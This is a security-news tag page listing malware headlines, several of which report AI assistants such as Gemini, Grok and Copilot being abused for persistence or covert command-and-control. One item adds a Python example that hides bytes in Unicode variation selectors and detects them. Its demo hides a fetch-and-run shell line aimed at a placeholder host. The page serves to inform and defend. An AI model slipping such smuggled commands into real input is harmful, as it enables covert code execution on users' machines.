Tag: malware
-
PromptSpy is the first Android malware to use generative AI at runtime
Researchers have discovered the first known Android malware to use generative AI in its execution flow, using Google’s Gemini model to adapt its persistence across different devices. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/promptspy-is-the-first-android-malware-to-use-generative-ai-at-runtime/
-
Google says its AI systems helped deter Play Store malware in 2025
Google said it prevented 1.75 million bad apps from going live on Google Play during 2025, a figure that’s down from previous years. First seen on techcrunch.com Jump to article: techcrunch.com/2026/02/19/google-says-its-ai-systems-helped-deter-play-store-malware-in-2025/
-
PromptSpy Android Malware Abuses Gemini AI to Automate Recent-Apps Persistence
Cybersecurity researchers have discovered what they say is the first Android malware that abuses Gemini, Google’s generative artificial intelligence (AI) chatbot, as part of its execution flow and achieves persistence. The malware has been codenamed PromptSpy by ESET. The malware is equipped to capture lockscreen data, block uninstallation efforts, gather device information, take screenshots, First seen…
-
Crims hit a $20M jackpot via malware-stuffed ATMs
FBI warns these cyber-physical attacks are on the rise First seen on theregister.com Jump to article: www.theregister.com/2026/02/19/crims_atm_jackpotting/
-
PromptSpy Android malware may exploit Gemini AI
A newly-uncovered malware targeting the Android operating system seems to exploit Google’s Gemini GenAI tool to help it maintain persistence. First seen on computerweekly.com Jump to article: www.computerweekly.com/news/366639201/PromptSpy-Android-malware-may-exploit-Gemini-AI
-
The Cloud and AI Velocity Trap: Why Governance Is Falling Behind Innovation
Tags: access, ai, attack, business, cloud, compliance, control, cyber, data, flaw, framework, governance, grc, iam, identity, least-privilege, malicious, malware, radius, risk, risk-management, service, supply-chain, tactics, threat, tool, vulnerability, zero-trust
AI adoption is outpacing traditional cyber governance. The “Tenable Cloud and AI Security Risk Report 2026” reveals how overprivileged identities and unmonitored supply chain dependencies leave orgs exposed. We offer 10 tactics to shut down your most critical attack paths. Key takeaways The velocity trap: Security teams are fighting “machine-speed” threats with manual processes; you…
-
Android malware taps Gemini to navigate infected devices
The real deal or another research project overblown? First seen on theregister.com Jump to article: www.theregister.com/2026/02/19/genai_malware_android/
-
China-Linked Hackers Use Dell RecoverPoint Flaw to Drop GrimBolt Malware
Dell warns of a critical security hole in its RecoverPoint software exploited by hackers. Learn how to protect your data from the CVE-2026-22769 vulnerability and the new GrimBolt malware. First seen on hackread.com Jump to article: hackread.com/china-hackers-dell-recoverpoint-flaw-grimbolt-malware/
-
Malvertising against Mac users via Evernote links
Popular software and tools remain effective decoys in the service of cybercriminals. They are currently running Google ads aimed at Mac users interested in applications such as Microsoft Office, LibreOffice, Notepad++, 7-Zip, VLC or Final Cut Pro. The perpetrators direct their victims to pages shared on Evernote that contain malicious links. After clicking the links with the supposed offers, the victims run commands…
-
Proactive threat intelligence and unified protection are becoming more important as complexity grows
Looking at the second half of 2025, Watchguard Technologies records a rapid rise in evasive and encrypted malware in its current Internet Security Report. This trend underlines the need for proactive, holistic security approaches. Based on anonymized, aggregated threat data from Watchguard’s network, endpoint and DNS filtering solutions, the report makes clear that both the volume and the sophistication of malware attacks are increasing. At the same time…
-
PromptSpy: First Android malware to use generative AI in its execution flow
ESET researchers have discovered PromptSpy, the first known Android malware to abuse generative AI as part of its execution flow in order to achieve persistence. This marks … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/02/19/promptspy-android-malware-generative-ai/
-
Infostealer Found Stealing OpenClaw AI Identity and Memory Files
Researchers at Hudson Rock have identified a live infection where an infostealer exfiltrated a victim’s OpenClaw configuration. The discovery highlights a shift in malware behaviour toward harvesting personal AI identity files. First seen on hackread.com Jump to article: hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/
-
Massiv Attack: Android Trojan Targets IPTV Users
New Trojan May Soon Be Offered for Sale to Criminal Underground. Security researchers warn of Massiv, an Android Trojan – disguised as an IPTV app – targeting users who sideload streaming apps. The malware enables screen capture, overlays and credential theft – and may soon be marketed on criminal underground forums as malware as a…
-
New ‘Massiv’ Android banking malware poses as an IPTV app
A newly identified Android banking trojan named Massiv has been under active distribution across southern Europe, disguised as an IPTV app. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-massiv-android-banking-malware-poses-as-an-iptv-app/
-
Fake IPTV Apps Spread Massiv Android Malware Targeting Mobile Banking Users
Cybersecurity researchers have disclosed details of a new Android trojan called Massiv that’s designed to facilitate device takeover (DTO) attacks for financial theft. The malware, according to ThreatFabric, masquerades as seemingly harmless IPTV apps to deceive victims, indicating that the activity is primarily singling out users looking for online TV applications. ”This new threat, while First…
-
Hackers Hide Malware in Emoji-Based Code to Bypass Security Defenses
Hackers are increasingly abusing emoji and other Unicode tricks to hide malicious code, bypass filters, and evade modern security controls, including AI-powered defenses. This emerging technique, known as emoji or Unicode smuggling, turns harmless-looking characters into stealth carriers for commands, data, and exploit payloads. Emoji smuggling is an obfuscation technique in which attackers encode malicious content using…
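An added example (not code from the article or from the researchers it cites) of the smuggling mechanism described above, covering both the attacker’s encoding step and the check a filter can run. It assumes the hidden bytes ride in Unicode variation selectors (U+FE00..U+FE0F and U+E0100..U+E01EF) appended after a visible emoji, which renderers silently drop; the truncated summary does not say which code points the reported attackers used, so that choice, the constructed sample message and the `scan`/`suspicious_runs` helper names are assumptions. The block also counts Unicode tag characters (U+E0000..U+E007F), a second invisible range used the same way.

```python
"""
Emoji / Unicode smuggling: hide arbitrary bytes behind a single visible
character, then detect and recover them.

Assumption (not from the article): bytes are mapped onto the two
variation-selector blocks, one invisible selector per payload byte.
"""

VS_LOW = 0xFE00       # VS1..VS16   -> byte values 0..15
VS_HIGH = 0xE0100     # VS17..VS256 -> byte values 16..255
TAG_START, TAG_END = 0xE0000, 0xE007F   # Unicode "tag" characters, also invisible


def byte_to_vs(b: int) -> str:
    """Map one byte to the variation selector that carries it."""
    return chr(VS_LOW + b) if b < 16 else chr(VS_HIGH + (b - 16))


def vs_to_byte(ch: str):
    """Inverse of byte_to_vs; None if ch is not a variation selector."""
    cp = ord(ch)
    if VS_LOW <= cp <= VS_LOW + 15:
        return cp - VS_LOW
    if VS_HIGH <= cp <= VS_HIGH + 239:
        return cp - VS_HIGH + 16
    return None


def smuggle(carrier: str, payload: bytes) -> str:
    """Attacker side: the result renders as just `carrier`."""
    return carrier + "".join(byte_to_vs(b) for b in payload)


def extract_runs(text: str):
    """Defender side: (carrier, hidden_bytes) for every selector run in text."""
    runs, carrier, buf = [], "", bytearray()
    for ch in text:
        b = vs_to_byte(ch)
        if b is not None:
            buf.append(b)
            continue
        if buf:
            runs.append((carrier, bytes(buf)))
            buf = bytearray()
        carrier = ch
    if buf:
        runs.append((carrier, bytes(buf)))
    return runs


def suspicious_runs(text: str, min_len: int = 2):
    """Legitimate text carries at most one selector after a base character
    (e.g. U+2764 U+FE0F for a red heart); longer runs are the smuggling signal."""
    return [(c, p) for c, p in extract_runs(text) if len(p) >= min_len]


def count_tag_chars(text: str) -> int:
    """Tag characters have no normal use outside subdivision-flag emoji
    sequences (e.g. the England flag), so any count in chat or prompt input
    deserves review."""
    return sum(1 for ch in text if TAG_START <= ord(ch) <= TAG_END)


def scan(text: str) -> dict:
    """What an inline filter could log for one message."""
    runs = suspicious_runs(text)
    visible = [ch for ch in text
               if vs_to_byte(ch) is None and not TAG_START <= ord(ch) <= TAG_END]
    return {
        "visible_len": len(visible),
        "total_len": len(text),
        "hidden_payloads": [p.decode("latin-1") for _, p in runs],
        "tag_chars": count_tag_chars(text),
    }


if __name__ == "__main__":
    # Constructed sample: a lone smiley that secretly carries a shell one-liner.
    cmd = b"curl -s http://example.invalid/p | sh"
    msg = "ok " + smuggle("\U0001F600", cmd) + " done"
    print(scan(msg))
```

The gap between `visible_len` and `total_len` is the cheapest single signal: a message that renders as nine characters but is fifty code points long has no honest explanation. Filters that normalise or strip unknown code points before inspection will miss this, because the payload survives copy-paste and most rendering paths intact.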
-
CRESCENTHARVEST Campaign Targets Iran Protest Supporters With RAT Malware
Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long-term espionage. The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, with the attacks designed to deliver a malicious payload that serves as a remote access trojan (RAT)…
-
Chinese hackers exploited zero-day Dell RecoverPoint flaw for 1.5 years
Pivot techniques: In addition to the payloads themselves, the investigation also revealed new techniques. For example, the legitimate shell script convert_hosts.sh that exists on these appliances has been modified to include the path of the backdoors to achieve persistence. The SLAYSTYLE web shell, which is designed to receive commands over HTTP and execute them on the…
-
Notepad++ patches flaw used to hijack update system
Notepad++ patched a vulnerability that attackers used to hijack its update system and deliver malware to targeted users. Notepad++ fixed a vulnerability that allowed a China-linked APT group to hijack its update mechanism and selectively push malware to chosen targets. In early February, the Notepad++ maintainer revealed that nation-state hackers compromised the hosting provider’s infrastructure,…
-
Zero-Day in Dell RecoverPoint Enables GRIMBOLT Backdoor
A Dell RecoverPoint zero-day has been exploited to deploy GRIMBOLT malware and pivot into VMware environments. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/zero-day-in-dell-recoverpoint-enables-grimbolt-backdoor/
-
AI platforms can be abused for stealthy malware communication
AI assistants like Grok and Microsoft Copilot with web browsing and URL-fetching capabilities can be abused to intermediate command-and-control (C2) activity. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-platforms-can-be-abused-for-stealthy-malware-communication/
-
AI Assistants Used as Covert Command-and-Control Relays
AIs like Grok and Microsoft Copilot can be exploited as covert C2 channels for malware communication First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/ai-assistants-covert-c2-relays/

